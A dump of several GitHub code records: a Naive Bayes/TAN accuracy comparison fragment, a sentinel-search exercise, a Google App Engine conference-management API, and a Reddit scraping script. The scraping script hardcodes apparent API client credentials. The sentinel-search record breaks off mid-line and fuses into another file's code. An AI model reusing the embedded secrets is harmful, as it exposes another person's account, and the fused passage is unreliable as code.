[]\n\ttestFoldIdx = [foldSize*i, foldSize*(i+1)]\n\tif testFoldIdx[1] > len(Data): testFoldIdx[1] = len(Data)\n\tfor j in range(len(Data)):\n\t\tif j in range(testFoldIdx[0], testFoldIdx[1]+1):\n\t\t\ttestData.append(Data[j])\n\t\telse:\n\t\t\ttrainingData.append(Data[j])\n\n\t# TAN\n\tresults_t = bayes(trainingSetPath, testSetPath, \"t\", trainingData, testData)\n\tpredictions = [probability >= 0.5 for probability in results_t[1]]\n\taccuracy_t = sum([predictions[i] == results_t[0][i] \\\n\t\tfor i in range(len(predictions))])/len(predictions)\n\n\t# Naive Bayes\n\tresults_n = bayes(trainingSetPath, testSetPath, \"n\", trainingData, testData)\n\tpredictions = [probability >= 0.5 for probability in results_n[1]]\n\taccuracy_n = sum([predictions[i] == results_n[0][i] \\\n\t\tfor i in range(len(predictions))])/len(predictions)\n\n\t# print accuracy results\n\tprint(\"%.4f\"%accuracy_t, end = \" \")\n\tprint(\"&\", end = \" \")\n\tprint(\"%.4f\"%accuracy_n, end = \" \")\n\tprint(\"&\", end = \" \")\n\tprint(\"%.4f\"%(accuracy_t - accuracy_n), end = \"\\\\\\\\ \\n\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mcreduardo/NaiveBayes_and_TAN_python","sub_path":"code/t_test.py","file_name":"t_test.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41720618326","text":"''' sentinel search:In this search, the last element of the array is replaced with the\r\n element to be searched and then the linear search is performed on the array without \r\n checking whether the current index is inside the index range of the array or not \r\n because the element to be searched will definitely be found inside the array even \r\n if it was not present in the original array since the last element got replaced with it. \r\n So, the index to be checked will never be out of the bounds of the array. \r\n The number of comparisons in the worst case there will be (N + 2). '''\r\n \r\ndef sentinelsearch():\r\n list=[]\r\n n=int(input(\"Enter the number of elements to insert list:\"))\r\n for i in range (n):\r\n e = int(input(\"enter key element:\"))\r\n list.append(e)\r\n print(list)\r\n key=int(input(\"Enter the number you want to search:\"))\r\n last = list[n-1]\r\n list[n-1]=key #assigning key value to the last position in list\r\n i=0\r\n while (list[i]!=key):\r\n i+=1\r\n list[n-1]=last #put last element back to position\r\n if((i',\n 'GTEQ': '>=',\n 'LT': '<',\n 'LTEQ': '<=',\n 'NE': '!='\n }\n\nFIELDS = {'CITY': 'city',\n 'TOPIC': 'topics',\n 'MONTH': 'month',\n 'MAX_ATTENDEES': 'maxAttendees',\n 'DURATION': 'duration',\n 'SESS_START_TIME': 'startTime',\n 'TYPE_OF_SESSION': 'typeOfSession'\n }\n\nCONF_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeConferenceKey=messages.StringField(1),\n)\n\nCONF_POST_REQUEST = endpoints.ResourceContainer(\n ConferenceForm,\n websafeConferenceKey=messages.StringField(1),\n)\n\nSESS_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeConferenceKey=messages.StringField(1),\n)\n\nSESS_POST_REQUEST = endpoints.ResourceContainer(\n SessionForm,\n websafeConferenceKey=messages.StringField(1),\n)\n\nSESS_TYPE_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeConferenceKey=messages.StringField(1),\n typeOfSession=messages.StringField(2)\n)\n\nSESS_WISH_POST_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeSessionKey=messages.StringField(1)\n)\n\nSESS_FILTER_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeConferenceKey=messages.StringField(1),\n operator=messages.StringField(2),\n value=messages.StringField(3)\n)\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n@endpoints.api(name='conference', version='v1',\n allowed_client_ids=[WEB_CLIENT_ID, API_EXPLORER_CLIENT_ID],\n scopes=[EMAIL_SCOPE])\nclass ConferenceApi(remote.Service):\n \"\"\"Conference API v0.1\"\"\"\n\n# - - - Conference objects - - - - - - - - - - - - - - - - -\n\n def _copyConferenceToForm(self, conf, displayName):\n \"\"\"Copy relevant fields from Conference to ConferenceForm.\"\"\"\n cf = ConferenceForm()\n for field in cf.all_fields():\n if hasattr(conf, field.name):\n # convert Date to date string; just copy others\n if field.name.endswith('Date'):\n setattr(cf, field.name, str(getattr(conf, field.name)))\n else:\n setattr(cf, field.name, getattr(conf, field.name))\n elif field.name == \"websafeKey\":\n setattr(cf, field.name, conf.key.urlsafe())\n if displayName:\n setattr(cf, 'organizerDisplayName', displayName)\n cf.check_initialized()\n return cf\n\n\n def _createConferenceObject(self, request):\n \"\"\"Create or update Conference object, returning ConferenceForm/request.\"\"\"\n # preload necessary data items\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n user_id = getUserId(user)\n # Ensure a profile gets created or conference retreival will fail.\n profile = self._getProfileFromUser()\n if not profile:\n raise endpoints.ConflictException(\"Unable to create or retrieve profile.\")\n if not request.name:\n raise endpoints.BadRequestException(\"Conference 'name' field required\")\n\n # copy ConferenceForm/ProtoRPC Message into dict\n data = {field.name: getattr(request, field.name) for field in request.all_fields()}\n del data['websafeKey']\n del data['organizerDisplayName']\n\n # add default values for those missing (both data model & outbound Message)\n for df in DEFAULTS:\n if data[df] in (None, []):\n data[df] = DEFAULTS[df]\n setattr(request, df, DEFAULTS[df])\n\n # convert dates from strings to Date objects; set month based on start_date\n if data['startDate']:\n data['startDate'] = datetime.strptime(data['startDate'][:10], \"%Y-%m-%d\").date()\n data['month'] = data['startDate'].month\n else:\n data['month'] = 0\n if data['endDate']:\n data['endDate'] = datetime.strptime(data['endDate'][:10], \"%Y-%m-%d\").date()\n\n # set seatsAvailable to be same as maxAttendees on creation\n if data[\"maxAttendees\"] > 0:\n data[\"seatsAvailable\"] = data[\"maxAttendees\"]\n # generate Profile Key based on user ID and Conference\n # ID based on Profile key get Conference key from ID\n p_key = ndb.Key(Profile, user_id)\n c_id = Conference.allocate_ids(size=1, parent=p_key)[0]\n c_key = ndb.Key(Conference, c_id, parent=p_key)\n data['key'] = c_key\n data['organizerUserId'] = request.organizerUserId = user_id\n\n # create Conference, send email to organizer confirming\n # creation of Conference & return (modified) ConferenceForm\n Conference(**data).put()\n taskqueue.add(params={'email': user.email(),\n 'conferenceInfo': repr(request)},\n url='/tasks/send_confirmation_email')\n\n return request\n\n\n @ndb.transactional()\n def _updateConferenceObject(self, request):\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n user_id = getUserId(user)\n\n # copy ConferenceForm/ProtoRPC Message into dict\n data = {field.name: getattr(request, field.name) for field in request.all_fields()}\n\n # update existing conference\n conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()\n # check that conference exists\n if not conf:\n raise endpoints.NotFoundException(\n 'No conference found with key: %s' % request.websafeConferenceKey)\n\n # check that user is owner\n if user_id != conf.organizerUserId:\n raise endpoints.ForbiddenException(\n 'Only the owner can update the conference.')\n\n # Not getting all the fields, so don't create a new object; just\n # copy relevant fields from ConferenceForm to Conference object\n for field in request.all_fields():\n data = getattr(request, field.name)\n # only copy fields where we get data\n if data not in (None, []):\n # special handling for dates (convert string to Date)\n if field.name in ('startDate', 'endDate'):\n data = datetime.strptime(data, \"%Y-%m-%d\").date()\n if field.name == 'startDate':\n conf.month = data.month\n # write to Conference object\n setattr(conf, field.name, data)\n conf.put()\n prof = ndb.Key(Profile, user_id).get()\n return self._copyConferenceToForm(conf, getattr(prof, 'displayName'))\n\n\n @endpoints.method(ConferenceForm, ConferenceForm,\n path='conference',\n http_method='POST', name='createConference')\n def createConference(self, request):\n \"\"\"Create new conference.\"\"\"\n return self._createConferenceObject(request)\n\n\n @endpoints.method(CONF_POST_REQUEST, ConferenceForm,\n path='conference/{websafeConferenceKey}',\n http_method='PUT', name='updateConference')\n def updateConference(self, request):\n \"\"\"Update conference w/provided fields & return w/updated info.\"\"\"\n return self._updateConferenceObject(request)\n\n\n @endpoints.method(CONF_GET_REQUEST, ConferenceForm,\n path='conference/{websafeConferenceKey}',\n http_method='GET', name='getConference')\n def getConference(self, request):\n \"\"\"Return requested conference (by websafeConferenceKey).\"\"\"\n # get Conference object from request; bail if not found\n conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()\n if not conf:\n raise endpoints.NotFoundException(\n 'No conference found with key: %s' % request.websafeConferenceKey)\n prof = conf.key.parent().get()\n # return ConferenceForm\n return self._copyConferenceToForm(conf, getattr(prof, 'displayName'))\n\n\n @endpoints.method(message_types.VoidMessage, ConferenceForms,\n path='getConferencesCreated',\n http_method='POST',\n name='getConferencesCreated')\n def getConferencesCreated(self, request):\n \"\"\"Return conferences created by user.\"\"\"\n # make sure user is authed\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n user_id = getUserId(user)\n # create ancestor query for all key matches for this user\n confs = Conference.query(ancestor=ndb.Key(Profile, user_id))\n prof = ndb.Key(Profile, user_id).get()\n # return set of ConferenceForm objects per Conference\n return ConferenceForms(\n items=[self._copyConferenceToForm(conf, getattr(prof, 'displayName'))\n for conf in confs]\n )\n\n\n def _getSessionQuery(self, request, ancestor=None):\n \"\"\"Return formatted query from the submitted filter\"\"\"\n if not ancestor:\n q = Session.query()\n else:\n a_key = ancestor\n q = Session.query(ancestor=ndb.Key(urlsafe=a_key))\n\n inequality_filter, filters = self._formatFilters(request.filters)\n\n # If exists, sort on inequality filter first\n if not inequality_filter:\n q = q.order(Session.name)\n else:\n q = q.order(ndb.GenericProperty(inequality_filter))\n q = q.order(Session.name)\n\n for filtr in filters:\n if filtr[\"field\"] in [\"duration\"]:\n filtr[\"value\"] = int(filtr[\"value\"])\n formatted_query = ndb.query.FilterNode(filtr[\"field\"], filtr[\"operator\"], filtr[\"value\"])\n q = q.filter(formatted_query)\n return q\n\n\n def _getConferenceQuery(self, request):\n \"\"\"Return formatted query from the submitted filters.\"\"\"\n q = Conference.query()\n inequality_filter, filters = self._formatFilters(request.filters)\n # If exists, sort on inequality filter first\n if not inequality_filter:\n q = q.order(Conference.name)\n else:\n q = q.order(ndb.GenericProperty(inequality_filter))\n q = q.order(Conference.name)\n\n for filtr in filters:\n if filtr[\"field\"] in [\"month\", \"maxAttendees\"]:\n filtr[\"value\"] = int(filtr[\"value\"])\n formatted_query = ndb.query.FilterNode(filtr[\"field\"], filtr[\"operator\"], filtr[\"value\"])\n q = q.filter(formatted_query)\n return q\n\n\n def _formatFilters(self, filters):\n \"\"\"Parse, check validity and format user supplied filters.\"\"\"\n formatted_filters = []\n inequality_field = None\n\n for f in filters:\n filtr = {field.name: getattr(f, field.name) for field in f.all_fields()}\n try:\n filtr[\"field\"] = FIELDS[filtr[\"field\"]]\n filtr[\"operator\"] = OPERATORS[filtr[\"operator\"]]\n except KeyError:\n raise endpoints.BadRequestException(\"Filter contains invalid field or operator.\")\n\n # Every operation except \"=\" is an inequality\n if filtr[\"operator\"] != \"=\":\n # check if inequality operation has been used in previous filters\n # disallow the filter if inequality was performed on a different field before\n # track the field on which the inequality operation is performed\n if inequality_field and inequality_field != filtr[\"field\"]:\n raise endpoints.BadRequestException(\"Inequality filter is allowed on only one field.\")\n else:\n inequality_field = filtr[\"field\"]\n\n formatted_filters.append(filtr)\n return (inequality_field, formatted_filters)\n\n\n @endpoints.method(QueryForms, ConferenceForms,\n path='queryConferences',\n http_method='POST',\n name='queryConferences')\n def queryConferences(self, request):\n \"\"\"Query for conferences.\"\"\"\n conferences = self._getConferenceQuery(request)\n\n # need to fetch organiser displayName from profiles\n # get all keys and use get_multi for speed\n organisers = [(ndb.Key(Profile, conf.organizerUserId)) for conf in conferences]\n profiles = ndb.get_multi(organisers)\n\n # put display names in a dict for easier fetching\n names = {}\n for profile in profiles:\n names[profile.key.id()] = profile.displayName\n\n # return individual ConferenceForm object per Conference\n return ConferenceForms(items=[\n self._copyConferenceToForm(conf, names[conf.organizerUserId])\n for conf in conferences]\n )\n\n\n# - - - Profile objects - - - - - - - - - - - - - - - - - - -\n\n def _copyProfileToForm(self, prof):\n \"\"\"Copy relevant fields from Profile to ProfileForm.\"\"\"\n # copy relevant fields from Profile to ProfileForm\n pf = ProfileForm()\n for field in pf.all_fields():\n if hasattr(prof, field.name):\n # convert t-shirt string to Enum; just copy others\n if field.name == 'teeShirtSize':\n setattr(pf, field.name, getattr(TeeShirtSize, getattr(prof, field.name)))\n else:\n setattr(pf, field.name, getattr(prof, field.name))\n pf.check_initialized()\n return pf\n\n\n def _getProfileFromUser(self):\n \"\"\"Return user Profile from datastore, creating new one if non-existent.\"\"\"\n # make sure user is authed\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n\n # get Profile from datastore\n user_id = getUserId(user)\n p_key = ndb.Key(Profile, user_id)\n profile = p_key.get()\n # create new Profile if not there\n if not profile:\n profile = Profile(\n key=p_key,\n displayName=user.nickname(),\n mainEmail=user.email(),\n teeShirtSize=str(TeeShirtSize.NOT_SPECIFIED),\n )\n profile.put()\n\n return profile # return Profile\n\n\n def _doProfile(self, save_request=None):\n \"\"\"Get user Profile and return to user, possibly updating it first.\"\"\"\n # get user Profile\n prof = self._getProfileFromUser()\n\n # if saveProfile(), process user-modifyable fields\n if save_request:\n for field in ('displayName', 'teeShirtSize'):\n if hasattr(save_request, field):\n val = getattr(save_request, field)\n if val:\n setattr(prof, field, str(val))\n prof.put()\n\n # return ProfileForm\n return self._copyProfileToForm(prof)\n\n\n @endpoints.method(message_types.VoidMessage, ProfileForm,\n path='profile', http_method='GET', name='getProfile')\n def getProfile(self, request):\n \"\"\"Return user profile.\"\"\"\n return self._doProfile()\n\n\n @endpoints.method(ProfileMiniForm, ProfileForm,\n path='profile', http_method='POST', name='saveProfile')\n def saveProfile(self, request):\n \"\"\"Update & return user profile.\"\"\"\n return self._doProfile(request)\n\n\n# - - - Registration - - - - - - - - - - - - - - - - - - - -\n\n @ndb.transactional(xg=True)\n def _conferenceRegistration(self, request, reg=True):\n \"\"\"Register or unregister user for selected conference.\"\"\"\n retval = None\n prof = self._getProfileFromUser() # get user Profile\n\n # check if conf exists given websafeConfKey\n # get conference; check that it exists\n wsck = request.websafeConferenceKey\n conf = ndb.Key(urlsafe=wsck).get()\n if not conf:\n raise endpoints.NotFoundException(\n 'No conference found with key: %s' % wsck)\n\n # register\n if reg:\n # check if user already registered otherwise add\n if wsck in prof.conferenceKeysToAttend:\n raise ConflictException(\n \"You have already registered for this conference\")\n\n # check if seats avail\n if conf.seatsAvailable <= 0:\n raise ConflictException(\n \"There are no seats available.\")\n\n # register user, take away one seat\n prof.conferenceKeysToAttend.append(wsck)\n conf.seatsAvailable -= 1\n retval = True\n\n # unregister\n else:\n # check if user already registered\n if wsck in prof.conferenceKeysToAttend:\n\n # unregister user, add back one seat\n prof.conferenceKeysToAttend.remove(wsck)\n # remove sessions from wishlist\n seshs = Session.query(ancestor=ndb.Key(urlsafe=wsck)) \n for session in seshs:\n s_key = session.key.urlsafe()\n if s_key in prof.sessionWishlist:\n prof.sessionWishlist.remove(s_key)\n conf.seatsAvailable += 1\n retval = True\n else:\n retval = False\n\n # write things back to the datastore & return\n prof.put()\n conf.put()\n return BooleanMessage(data=retval)\n\n\n @endpoints.method(message_types.VoidMessage, ConferenceForms,\n path='conferences/attending',\n http_method='GET', name='getConferencesToAttend')\n def getConferencesToAttend(self, request):\n \"\"\"Get list of conferences that user has registered for.\"\"\"\n prof = self._getProfileFromUser() # get user Profile\n conf_keys = [ndb.Key(urlsafe=wsck) for wsck in prof.conferenceKeysToAttend]\n conferences = ndb.get_multi(conf_keys)\n\n # get organizers\n organisers = [ndb.Key(Profile, conf.organizerUserId) for conf in conferences]\n profiles = ndb.get_multi(organisers)\n\n # put display names in a dict for easier fetching\n names = {}\n for profile in profiles:\n names[profile.key.id()] = profile.displayName\n\n # return set of ConferenceForm objects per Conference\n return ConferenceForms(items=[\n self._copyConferenceToForm(conf, names[conf.organizerUserId])\n for conf in conferences]\n )\n\n\n @endpoints.method(CONF_GET_REQUEST, BooleanMessage,\n path='conference/{websafeConferenceKey}',\n http_method='POST', name='registerForConference')\n def registerForConference(self, request):\n \"\"\"Register user for selected conference.\"\"\"\n return self._conferenceRegistration(request)\n\n\n @endpoints.method(CONF_GET_REQUEST, BooleanMessage,\n path='conference/{websafeConferenceKey}',\n http_method='DELETE', name='unregisterFromConference')\n def unregisterFromConference(self, request):\n \"\"\"Unregister user for selected conference.\"\"\"\n return self._conferenceRegistration(request, reg=False)\n\n\n# - - - Featured Speaker - - - - - - - - - - - - - - - - - - - -\n\n def _getMemcacheData(self, conference, sessions):\n \"\"\"Format the featured speaker message to say what \n sessions the speaker is speaking at and generate a \n conference-specific memcache key for the featured speaker.\n \"\"\"\n sessionNames = \"\"\n for session in sessions:\n sessionNames += session.name + \", \"\n\n sessionNames = sessionNames[:len(sessionNames) - 2]\n sessionNames = sessionNames[::-1]\n sessionNames = sessionNames.replace(\" ,\", \" dna ,\", 1)\n sessionNames = sessionNames[::-1]\n speakingAt = \"{0} is speaking at: {1}\".format(session.speaker, sessionNames)\n memcacheKey = conference.name.replace(\" \", \"_\").upper()\n memcacheKey += MEMCACHE_SPEAKER_KEY\n return memcacheKey, speakingAt\n\n\n @staticmethod\n def _setSpeakerInMemcache(memcacheKey, message):\n \"\"\"Add a featured speaker key to the memcache. The most recent\n speaker with multiple session will be in the cache.\n \"\"\"\n memcache.set(memcacheKey, message)\n\n\n @endpoints.method(CONF_GET_REQUEST, StringMessage,\n path='conference/featuredSpeaker/get',\n http_method='GET',\n name='getFeaturedSpeaker')\n def getFeaturedSpeaker(self, request):\n \"\"\"Return featured speaker from memcache.\"\"\"\n wsck = request.websafeConferenceKey\n if not wsck:\n raise endpoints.BadRequestException(\n \"You must specify a conference key.\")\n conf = ndb.Key(urlsafe=wsck).get()\n if not conf:\n raise endpoints.NotFoundException(\"No conference found with that key.\")\n confNameKey = conf.name.upper().replace(\" \", \"_\")\n keySpeaker = memcache.get(confNameKey + MEMCACHE_SPEAKER_KEY)\n if not keySpeaker:\n keySpeaker = \"\"\n return StringMessage(message=keySpeaker)\n\n# - - - Announcements - - - - - - - - - - - - - - - - - - - -\n\n @staticmethod\n def _cacheAnnouncement():\n \"\"\"Create Announcement & assign to memcache; used by memcache cron\n job & putAnnouncement().\n \"\"\"\n confs = Conference.query(ndb.AND(\n Conference.seatsAvailable <= 5,\n Conference.seatsAvailable > 0)\n ).fetch(projection=[Conference.name])\n\n if confs:\n # If there are almost sold out conferecnes, format announcement\n # and set it in the memecache\n announcement = '{0} {1}'.\\\n format('Last chance to attend! The following conferecences '\n 'are nearly sold out:',\n ', '.join(conf.name for conf in confs))\n memcache.set(MEMCACHE_ANNOUNCEMENTS_KEY, announcement)\n else:\n # If there are no sold out conferences, delete the memcache\n # announcements entry\n announcement = \"\"\n memcache.delete(MEMCACHE_ANNOUNCEMENTS_KEY)\n\n return announcement\n\n @endpoints.method(message_types.VoidMessage, StringMessage,\n path='conference/announcement/get',\n http_method='GET',\n name='getAnnouncement')\n def getAnnouncement(self, request):\n \"\"\"Return Announcement from memcache.\"\"\"\n announcement = memcache.get(MEMCACHE_ANNOUNCEMENTS_KEY)\n if not announcement:\n announcement = \"\"\n return StringMessage(message=announcement)\n\n\n# - - - Sessions - - - - - - - - - - - - - - - - - - - -\n\n def _copySessionToForm(self, sess):\n \"\"\"Copy fieleds from the Session to the SessionForm.\"\"\"\n sf = SessionForm()\n for field in sf.all_fields():\n if hasattr(sess, field.name):\n if field.name == 'typeOfSession':\n setattr(sf, field.name,\n getattr(TypeOfSession, getattr(sess, field.name)))\n elif field.name in ('startTime', 'date'):\n setattr(sf, field.name, str(getattr(sess, field.name)))\n else:\n setattr(sf, field.name, getattr(sess, field.name))\n elif field.name == 'websafeKey':\n setattr(sf, field.name, sess.key.urlsafe())\n\n sf.check_initialized()\n return sf\n\n\n def _createSession(self, request):\n \"\"\"Create a session in a conference.\"\"\"\n # preload necessary data items\n wsck = request.websafeConferenceKey\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n user_id = getUserId(user)\n\n conf = ndb.Key(urlsafe=wsck).get()\n # check that conference exists\n if not conf:\n raise endpoints.NotFoundException(\n 'No conference found with key: %s' % request.websafeConferenceKey)\n\n # check that user is owner\n if user_id != conf.organizerUserId:\n raise endpoints.ForbiddenException(\n 'Only the owner can add a session to the conference.')\n\n if not request.name:\n raise endpoints.BadRequestException(\"Session 'name' field required\")\n\n # Check that session names are unique to a conference\n sameNameQuery = Session.query(ancestor=ndb.Key(urlsafe=wsck)).\\\n filter(Session.name != \"TBA\").\\\n filter(Session.name == request.name)\n if sameNameQuery.count() > 0:\n raise endpoints.BadRequestException(\n \"A session already exists with that name for this conference.\")\n\n # generate Session Key based on conference key,\n # session id, and session name.\n c_key = ndb.Key(urlsafe=request.websafeConferenceKey)\n s_id = Session.allocate_ids(size=1, parent=c_key)[0]\n s_key = ndb.Key(Session, s_id, parent=c_key)\n\n session = Session(key=s_key)\n\n for field in request.all_fields():\n data = getattr(request, field.name)\n if data not in (None, []):\n if field.name == 'startTime':\n data = datetime.strptime(data, \"%H:%M:%S\").time()\n if field.name == 'date':\n data = datetime.strptime(data, \"%Y-%m-%d\").date()\n if field.name == 'typeOfSession':\n data = str(data)\n\n setattr(session, field.name, data)\n\n session.put()\n\n # Check te see if the speaker of the sessions is doing any\n # other sessions. If so make them a featured speaker in memcache\n spkrSessions = Session.query(ancestor=ndb.Key(urlsafe=wsck)).\\\n filter(Session.speaker == session.speaker)\n if spkrSessions.count() > 1:\n memcacheKey, message = self._getMemcacheData(conf, spkrSessions)\n taskqueue.add(params={'memcacheKey': memcacheKey,\n 'message': message},\n url='/tasks/set_featured_speaker')\n return self._copySessionToForm(session)\n\n\n @endpoints.method(SESS_POST_REQUEST, SessionForm,\n path='session/{websafeConferenceKey}',\n http_method='POST',\n name='createSession')\n def createSession(self, request):\n \"\"\"Create new session in a conference.\"\"\"\n return self._createSession(request)\n\n\n @endpoints.method(SESS_GET_REQUEST, SessionForms,\n path='session/{websafeConferenceKey}',\n http_method='GET',\n name='getConferenceSessions')\n def getConferenceSessions(self, request):\n \"\"\"Return sessions that are in a conference.\"\"\"\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n\n sessions = Session.query(ancestor=ndb.Key(urlsafe=request.websafeConferenceKey))\n return SessionForms(\n sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n )\n\n\n @endpoints.method(SESS_TYPE_GET_REQUEST, SessionForms,\n path='session/type/{websafeConferenceKey}',\n http_method='GET',\n name='getSessionsByType')\n def getSessionsByType(self, request):\n \"\"\"Return sessions in a conference of a certain type.\"\"\"\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n # Filter sessions on their conference key and the type of session\n sessions = Session.query(\n ancestor=ndb.Key(urlsafe=request.websafeConferenceKey)\n ).filter(Session.typeOfSession == request.typeOfSession)\n return SessionForms(\n sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n )\n\n\n @endpoints.method(StringMessage, SessionForms,\n path='session/speaker',\n http_method='GET',\n name='getSessionsBySpeaker')\n def getSessionsBySpeaker(self, request):\n \"\"\"Get sessions by a speaker accross all conferences.\"\"\"\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n # Filter sessions on speaker name\n sessions = Session.query().filter(Session.speaker == request.message)\n return SessionForms(\n sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n )\n\n\n @endpoints.method(SESS_WISH_POST_REQUEST, BooleanMessage,\n path='profile/wishlist/{websafeSessionKey}',\n http_method='POST',\n name='addSessionToWishlist')\n def addSessionToWishlist(self, request):\n \"\"\"Add a sessions to a profiles wish to attend wishlist.\"\"\"\n retval = False\n wssk = request.websafeSessionKey\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n\n # Get the session\n session = ndb.Key(urlsafe=wssk).get()\n if not session:\n raise endpoints.NotFoundException(\n 'No session found with key: {}'.format(wssk))\n\n # Get the profile\n user_id = getUserId(user)\n profile = ndb.Key(Profile, user_id).get()\n\n # Check that it's not already on the wishlist\n if wssk in profile.sessionWishlist:\n raise ConflictException(\"This session is already in your wishlist.\")\n\n # Check that the session is in a conference the user is registered in\n if profile.conferenceKeysToAttend:\n seshs = [Session.query(ancestor=ndb.Key(urlsafe=p_key))\n for p_key in profile.conferenceKeysToAttend]\n if not seshs:\n raise endpoints.ForbiddenException(\n \"You are not attending the conference that this session is in.\")\n profile.sessionWishlist.append(wssk)\n profile.put()\n retval = True\n else:\n raise endpoints.ForbiddenException(\n \"You are not attending the conference that this session is in.\")\n\n return BooleanMessage(data=retval)\n\n\n @endpoints.method(CONF_GET_REQUEST, SessionForms,\n path='profile/wishlist/{websafeConferenceKey}',\n http_method='GET',\n name='getSessionsInWishlist')\n def getSessionsInWishlist(self, request):\n \"\"\"Get the sessions that are in the users wishlist, for the given conference key.\"\"\"\n wsck = request.websafeConferenceKey\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n\n # Get the profile\n user_id = getUserId(user)\n profile = ndb.Key(Profile, user_id).get()\n sessions = [ndb.Key(urlsafe=wssk).get() for wssk in profile.sessionWishlist]\n\n # If the session's parent key doesn't match the conference key\n # remove it from the list of sessions to display.\n for session in sessions:\n if session.key.parent().urlsafe() != wsck:\n sessions.remove(session)\n\n return SessionForms(\n sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n )\n\n\n @endpoints.method(SESS_WISH_POST_REQUEST, BooleanMessage,\n path='profile/wishlist/{websafeSessionKey}',\n http_method='DELETE',\n name='deleteSessionInWishlist')\n def deleteSessionInWishlist(self, request):\n \"\"\"Delete a session from the user's wishlist.\"\"\"\n wssk = request.websafeSessionKey\n retval = False\n\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n\n # Get the user profile and remove the session if it's there\n user_id = getUserId(user)\n profile = ndb.Key(Profile, user_id).get()\n if wssk in profile.sessionWishlist:\n profile.sessionWishlist.remove(wssk)\n retval = True\n\n # Update the profile\n profile.put()\n return BooleanMessage(data=retval)\n\n\n @endpoints.method(SESS_FILTER_GET_REQUEST, SessionForms,\n path='session/duration/{websafeConferenceKey}',\n http_method='GET',\n name='getSessionsByDuration')\n def getSessionsByDuration(self, request):\n \"\"\"Filter sessions based on its duration in a conference.\"\"\"\n # Authorize\n wsck = request.websafeConferenceKey\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n # Fill the query to have field, op and value\n query = QueryForm(field='DURATION',\n operator=request.operator,\n value=request.value)\n sessions = self._getSessionQuery(\n QueryForms(filters=[query]), ancestor=wsck)\n return SessionForms(\n sessions=[self._copySessionToForm(session) for session in sessions]\n )\n\n\n @endpoints.method(QueryForms, SessionForms,\n path='querySessions',\n http_method='POST',\n name='querySessions')\n def querySessions(self, request):\n \"\"\"Filter sessions based on its type and start time.\"\"\"\n # Authorize\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n\n # check for the first start time inequality and pull it out,\n # otherwise business as usual.\n typeToRemove = None\n fltrd_sess = []\n for queryform in request.filters:\n if queryform.field == \"SESS_START_TIME\":\n typeToRemove = queryform\n request.filters.remove(queryform)\n\n sessions = self._getSessionQuery(request)\n\n # Manually remove the sessions of a particular type\n if typeToRemove:\n for sesh in sessions:\n op = None\n try:\n op = OPERATORS[typeToRemove.operator]\n op = typeToRemove.operator\n except KeyError:\n raise endpoints.BadRequestException(\n \"Filter contains invalid field or operator.\")\n\n if sesh.startTime:\n try:\n filter_time = datetime.strptime(typeToRemove.value, \"%H:%M:%S\").time()\n except:\n raise endpoints.BadRequestException(\"Incorrect time format. Expecting: HH:MM:SS\")\n if op == \"EQ\":\n if sesh.startTime == filter_time:\n fltrd_sess.append(sesh)\n elif op == \"GT\":\n if sesh.startTime > filter_time:\n fltrd_sess.append(sesh)\n elif op == 'GTEQ':\n if sesh.startTime >= filter_time:\n fltrd_sess.append(sesh)\n elif op == 'LT':\n if sesh.startTime < filter_time:\n fltrd_sess.append(sesh)\n elif op == 'LTEQ':\n if sesh.startTime <= filter_time:\n fltrd_sess.append(sesh)\n elif op == 'NE':\n if sesh.startTime != filter_time:\n fltrd_sess.append(sesh)\n\n # Return time filtered sessions\n return SessionForms(\n sessions=[self._copySessionToForm(session) for session in fltrd_sess]\n )\n\n # Return sessions if query was standard\n return SessionForms(\n sessions=[self._copySessionToForm(session) for session in sessions]\n )\n\n\napi = endpoints.api_server([ConferenceApi]) # register API\n","repo_name":"Crewe/conference-central-api","sub_path":"conference.py","file_name":"conference.py","file_ext":"py","file_size_in_byte":38095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26926236901","text":"import praw\r\nimport pandas as pd\r\n\r\nredditApp = praw.Reddit(client_id='XDVRjPR6Wnr1ig', client_secret='crfLIN0aF9eGnmefzjzcW6hmcw4', user_agent='RedditScraping')\r\n\r\ntop_posts = redditApp.subreddit('InternetIsBeautiful').top(limit=1000) #top 1k post on the subreddit\r\nposts = []\r\n\r\n\r\nfor post in top_posts:\r\n posts.append([post.title, post.score, post.id, post.url])\r\n\r\nposts = pd.DataFrame(posts,columns=['title', 'score', 'id', 